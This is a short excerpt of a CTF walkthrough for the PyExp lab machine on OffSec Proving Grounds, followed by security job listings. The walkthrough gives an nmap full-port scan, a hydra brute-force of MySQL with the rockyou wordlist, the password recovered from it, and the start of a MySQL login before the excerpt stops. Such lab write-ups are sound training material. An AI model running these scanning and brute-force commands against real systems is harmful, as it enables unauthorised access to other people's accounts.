Feb. 28, 2024, 11:50 a.m. | Indranil

System Weakness - Medium systemweakness.com

PyExp CTF Walkthrough

PyExp | Level: Easy | Linux | Python

Machine URL —https://portal.offsec.com/labs/play

Machine IP — 192.168.172.118

Steps to Solve the machine:-

Enumeration

  1. Use nmap to enumerate the target
nmap -sC -sV -T4 -p- $ipTarget Enumeration using nmap

2. Bruteforce the mysql service to gather the login credentials.

# hydra -l root -P /usr/share/wordlists/rockyou.txt $ip mysql

Credentials found: username — root | Password — prettywoman

3. Login to mysql using the harvested credentials

mysql -u root -p -h …

linux oscp-preparation provinggrounds

Social Engineer For Reverse Engineering Exploit Study

@ Independent study | Remote

Offensive Security Engineer

@ Ivanti | United States, Remote

Senior Security Engineer I

@ Samsara | Remote - US

Senior Principal Information System Security Engineer

@ Chameleon Consulting Group | Herndon, VA

Junior Detections Engineer

@ Kandji | San Francisco

Data Security Engineer/ Architect - Remote United States

@ Stanley Black & Decker | Towson MD USA - 701 E Joppa Rd Bg 700